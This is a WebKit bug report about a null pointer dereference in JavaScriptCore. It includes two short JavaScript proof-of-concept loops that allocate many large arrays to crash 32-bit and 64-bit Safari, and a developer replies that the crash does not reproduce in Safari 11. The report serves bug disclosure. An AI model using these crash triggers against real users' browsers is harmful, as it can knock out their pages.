Bug 179364
| Summary: | null pointer dereference in JSC::DFG::operationNewArrayWithSize | | |
|---|---|---|---|
| Product: | WebKit | Reporter: | zhunkibatu |
| Component: | JavaScriptCore | Assignee: | Nobody <webkit-unassigned> |
| Status: | NEW | | |
| Severity: | Normal | CC: | fpizlo, vulbugs |
| Priority: | P2 | | |
| Version: | Safari 10 | | |
| Hardware: | PC | | |
| OS: | macOS 10.12.4 | | |
zhunkibatu
The following PoC can lead to a crash in a 32-bit build of WebKit.

```javascript
// Keep 10000 freshly allocated large arrays alive at once by cycling
// through the slots of the outer array.
var array = new Array(10000);
for (var i = 0; i < 20000; ++i) {
    var newArray = new Array(10000);
    array[i % array.length] = newArray;
}
```
To trigger a crash in 64-bit Safari, the PoC needs to change to

```javascript
// Same pattern with sizes scaled up by 10x for the 64-bit build.
var array = new Array(100000);
for (var i = 0; i < 200000; ++i) {
    var newArray = new Array(100000);
    array[i % array.length] = newArray;
}
```
Alexey Proskuryakov
I cannot reproduce this in Safari 11. I suspect that the page gets killed for using too much memory before this crash occurs, so not sure if the underlying problem is still present.